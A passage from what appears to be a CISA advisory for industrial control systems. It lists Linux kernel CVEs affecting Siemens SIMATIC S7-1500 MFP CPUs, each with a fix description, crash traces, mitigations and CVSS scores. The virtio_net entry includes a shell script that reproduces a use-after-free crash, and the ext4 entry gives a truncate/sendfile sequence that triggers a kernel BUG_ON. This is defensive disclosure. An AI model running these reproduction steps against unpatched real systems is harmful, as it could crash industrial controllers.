R08: 0000002000300000 R09: 000000010beb47ec R10: ffff9ea494590090 R11: 0000000000000000 R12: 0000002000300000 R13: ffffbbee806e7c90 R14: ffff9ea494513788 R15: ffffbbee806e7c88 FS: 00007fc2f9e3e6c0(0000) GS:ffff9ea6b1444000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000010beb47f4 CR3: 0000000119ac5000 CR4: 0000000000750ef0 PKRU: 55555554 Call Trace: filemap_get_folios_tag+0x87/0x2a0 __filemap_fdatawait_range+0x5f/0xd0 ? srso_alias_return_thunk+0x5/0xfbef5 ? __schedule+0x3e7/0x10c0 ? srso_alias_return_thunk+0x5/0xfbef5 ? srso_alias_return_thunk+0x5/0xfbef5 ? srso_alias_return_thunk+0x5/0xfbef5 ? preempt_count_sub+0x5f/0x80 ? srso_alias_return_thunk+0x5/0xfbef5 ? cap_safe_nice+0x37/0x70 ? srso_alias_return_thunk+0x5/0xfbef5 ? preempt_count_sub+0x5f/0x80 ? srso_alias_return_thunk+0x5/0xfbef5 filemap_fdatawait_range_keep_errors+0x12/0x40 ext4_fc_commit+0x697/0x8b0 ? ext4_file_write_iter+0x64b/0x950 ? srso_alias_return_thunk+0x5/0xfbef5 ? preempt_count_sub+0x5f/0x80 ? srso_alias_return_thunk+0x5/0xfbef5 ? vfs_write+0x356/0x480 ? srso_alias_return_thunk+0x5/0xfbef5 ? preempt_count_sub+0x5f/0x80 ext4_sync_file+0xf7/0x370 do_fsync+0x3b/0x80 ? syscall_trace_enter+0x108/0x1d0 __x64_sys_fdatasync+0x16/0x20 do_syscall_64+0x62/0x2c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e ... ``` Fix this by initializing the jbd2_inode first. Use smp_wmb() and WRITE_ONCE() to publish ei-&gt;jinode after initialization. Readers use READ_ONCE() to fetch the pointer.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31450">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31452</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: convert inline data to extents when truncate exceeds inline size Add a check in ext4_setattr() to convert files from inline data storage to extent-based storage when truncate() grows the file size beyond the inline capacity. This prevents the filesystem from entering an inconsistent state where the inline data flag is set but the file size exceeds what can be stored inline. Without this fix, the following sequence causes a kernel BUG_ON(): 1. Mount filesystem with inode that has inline flag set and small size 2. truncate(file, 50MB) - grows size but inline flag remains set 3. sendfile() attempts to write data 4. ext4_write_inline_data() hits BUG_ON(write_size &gt; inline_capacity) The crash occurs because ext4_write_inline_data() expects inline storage to accommodate the write, but the actual inline capacity (~60 bytes for i_block + ~96 bytes for xattrs) is far smaller than the file size and write request. The fix checks if the new size from setattr exceeds the inode's actual inline capacity (EXT4_I(inode)-&gt;i_inline_size) and converts the file to extent-based storage before proceeding with the size change. This addresses the root cause by ensuring the inline data flag and file size remain consistent during truncate operations.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31452">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31466</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/huge_memory: fix folio isn't locked in softleaf_to_folio() On arm64 server, we found folio that get from migration entry isn't locked in softleaf_to_folio(). This issue triggers when mTHP splitting and zap_nonpresent_ptes() races, and the root cause is lack of memory barrier in softleaf_to_folio(). The race is as follows: CPU0 CPU1 deferred_split_scan() zap_nonpresent_ptes() lock folio split_folio() unmap_folio() change ptes to migration entries __split_folio_to_order() softleaf_to_folio() set flags(including PG_locked) for tail pages folio = pfn_folio(softleaf_to_pfn(entry)) smp_wmb() VM_WARN_ON_ONCE(!folio_test_locked(folio)) prep_compound_page() for tail pages In __split_folio_to_order(), smp_wmb() guarantees page flags of tail pages are visible before the tail page becomes non-compound. smp_wmb() should be paired with smp_rmb() in softleaf_to_folio(), which is missed. As a result, if zap_nonpresent_ptes() accesses migration entry that stores tail pfn, softleaf_to_folio() may see the updated compound_head of tail page before page-&gt;flags. This issue will trigger VM_WARN_ON_ONCE() in pfn_swap_entry_folio() because of the race between folio split and zap_nonpresent_ptes() leading to a folio incorrectly undergoing modification without a folio lock being held. This is a BUG_ON() before commit 93976a20345b ("mm: eliminate further swapops predicates"), which in merged in v6.19-rc1. To fix it, add missing smp_rmb() if the softleaf entry is migration entry in softleaf_to_folio() and softleaf_to_page(). [tujinjiang@huawei.com: update function name and comments]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31466">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/366.html">CWE-366 Race Condition within a Thread</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31469</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: virtio_net: Fix UAF on dst_ops when IFF_XMIT_DST_RELEASE is cleared and napi_tx is false A UAF issue occurs when the virtio_net driver is configured with napi_tx=N and the device's IFF_XMIT_DST_RELEASE flag is cleared (e.g., during the configuration of tc route filter rules). When IFF_XMIT_DST_RELEASE is removed from the net_device, the network stack expects the driver to hold the reference to skb-&gt;dst until the packet is fully transmitted and freed. In virtio_net with napi_tx=N, skbs may remain in the virtio transmit ring for an extended period. If the network namespace is destroyed while these skbs are still pending, the corresponding dst_ops structure has freed. When a subsequent packet is transmitted, free_old_xmit() is triggered to clean up old skbs. It then calls dst_release() on the skb associated with the stale dst_entry. Since the dst_ops (referenced by the dst_entry) has already been freed, a UAF kernel paging request occurs. fix it by adds skb_dst_drop(skb) in start_xmit to explicitly release the dst reference before the skb is queued in virtio_net. Call Trace: Unable to handle kernel paging request at virtual address ffff80007e150000 CPU: 2 UID: 0 PID: 6236 Comm: ping Kdump: loaded Not tainted 7.0.0-rc1+ #6 PREEMPT ... percpu_counter_add_batch+0x3c/0x158 lib/percpu_counter.c:98 (P) dst_release+0xe0/0x110 net/core/dst.c:177 skb_release_head_state+0xe8/0x108 net/core/skbuff.c:1177 sk_skb_reason_drop+0x54/0x2d8 net/core/skbuff.c:1255 dev_kfree_skb_any_reason+0x64/0x78 net/core/dev.c:3469 napi_consume_skb+0x1c4/0x3a0 net/core/skbuff.c:1527 __free_old_xmit+0x164/0x230 drivers/net/virtio_net.c:611 [virtio_net] free_old_xmit drivers/net/virtio_net.c:1081 [virtio_net] start_xmit+0x7c/0x530 drivers/net/virtio_net.c:3329 [virtio_net] ... Reproduction Steps: NETDEV="enp3s0" config_qdisc_route_filter() { tc qdisc del dev $NETDEV root tc qdisc add dev $NETDEV root handle 1: prio tc filter add dev $NETDEV parent 1:0 \ protocol ip prio 100 route to 100 flowid 1:1 ip route add 192.168.1.100/32 dev $NETDEV realm 100 } test_ns() { ip netns add testns ip link set $NETDEV netns testns ip netns exec testns ifconfig $NETDEV 10.0.32.46/24 ip netns exec testns ping -c 1 10.0.32.1 ip netns del testns } config_qdisc_route_filter test_ns sleep 2 test_ns</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31469">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31485</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: spi: spi-fsl-lpspi: fix teardown order issue (UAF) There is a teardown order issue in the driver. The SPI controller is registered using devm_spi_register_controller(), which delays unregistration of the SPI controller until after the fsl_lpspi_remove() function returns. As the fsl_lpspi_remove() function synchronously tears down the DMA channels, a running SPI transfer triggers the following NULL pointer dereference due to use after free: | fsl_lpspi 42550000.spi: I/O Error in DMA RX | Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 [...] | Call trace: | fsl_lpspi_dma_transfer+0x260/0x340 [spi_fsl_lpspi] | fsl_lpspi_transfer_one+0x198/0x448 [spi_fsl_lpspi] | spi_transfer_one_message+0x49c/0x7c8 | __spi_pump_transfer_message+0x120/0x420 | __spi_sync+0x2c4/0x520 | spi_sync+0x34/0x60 | spidev_message+0x20c/0x378 [spidev] | spidev_ioctl+0x398/0x750 [spidev] [...] Switch from devm_spi_register_controller() to spi_register_controller() in fsl_lpspi_probe() and add the corresponding spi_unregister_controller() in fsl_lpspi_remove().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31485">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31494</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: macb: use the current queue number for stats There's a potential mismatch between the memory reserved for statistics and the amount of memory written. gem_get_sset_count() correctly computes the number of stats based on the active queues, whereas gem_get_ethtool_stats() indiscriminately copies data using the maximum number of queues, and in the case the number of active queues is less than MACB_MAX_QUEUES, this results in a OOB write as observed in the KASAN splat. ================================================================== BUG: KASAN: vmalloc-out-of-bounds in gem_get_ethtool_stats+0x54/0x78 [macb] Write of size 760 at addr ffff80008080b000 by task ethtool/1027 CPU: [...] Tainted: [E]=UNSIGNED_MODULE Hardware name: raspberrypi rpi/rpi, BIOS 2025.10 10/01/2025 Call trace: show_stack+0x20/0x38 (C) dump_stack_lvl+0x80/0xf8 print_report+0x384/0x5e0 kasan_report+0xa0/0xf0 kasan_check_range+0xe8/0x190 __asan_memcpy+0x54/0x98 gem_get_ethtool_stats+0x54/0x78 [macb 926c13f3af83b0c6fe64badb21ec87d5e93fcf65] dev_ethtool+0x1220/0x38c0 dev_ioctl+0x4ac/0xca8 sock_do_ioctl+0x170/0x1d8 sock_ioctl+0x484/0x5d8 __arm64_sys_ioctl+0x12c/0x1b8 invoke_syscall+0xd4/0x258 el0_svc_common.constprop.0+0xb4/0x240 do_el0_svc+0x48/0x68 el0_svc+0x40/0xf8 el0t_64_sync_handler+0xa0/0xe8 el0t_64_sync+0x1b0/0x1b8 The buggy address belongs to a 1-page vmalloc region starting at 0xffff80008080b000 allocated at dev_ethtool+0x11f0/0x38c0 The buggy address belongs to the physical page: page: refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff00000a333000 pfn:0xa333 flags: 0x7fffc000000000(node=0|zone=0|lastcpupid=0x1ffff) raw: 007fffc000000000 0000000000000000 dead000000000122 0000000000000000 raw: ffff00000a333000 0000000000000000 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff80008080b080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff80008080b100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &gt;ffff80008080b180: 00 00 00 00 00 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 ^ ffff80008080b200: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 ffff80008080b280: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 ================================================================== Fix it by making sure the copied size only considers the active number of queues.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31494">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31495</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: use netlink policy range checks Replace manual range and mask validations with netlink policy annotations in ctnetlink code paths, so that the netlink core rejects invalid values early and can generate extack errors. - CTA_PROTOINFO_TCP_STATE: reject values &gt; TCP_CONNTRACK_SYN_SENT2 at policy level, removing the manual &gt;= TCP_CONNTRACK_MAX check. - CTA_PROTOINFO_TCP_WSCALE_ORIGINAL/REPLY: reject values &gt; TCP_MAX_WSCALE (14). The normal TCP option parsing path already clamps to this value, but the ctnetlink path accepted 0-255, causing undefined behavior when used as a u32 shift count. - CTA_FILTER_ORIG_FLAGS/REPLY_FLAGS: use NLA_POLICY_MASK with CTA_FILTER_F_ALL, removing the manual mask checks. - CTA_EXPECT_FLAGS: use NLA_POLICY_MASK with NF_CT_EXPECT_MASK, adding a new mask define grouping all valid expect flags. Extracted from a broader nf-next patch by Florian Westphal, scoped to ctnetlink for the fixes tree.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31495">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1287.html">CWE-1287 Improper Validation of Specified Type of Input</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31496</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_expect: skip expectations in other netns via proc Skip expectations that do not reside in this netns. Similar to e77e6ff502ea ("netfilter: conntrack: do not dump other netns's conntrack entries via proc").</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31496">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
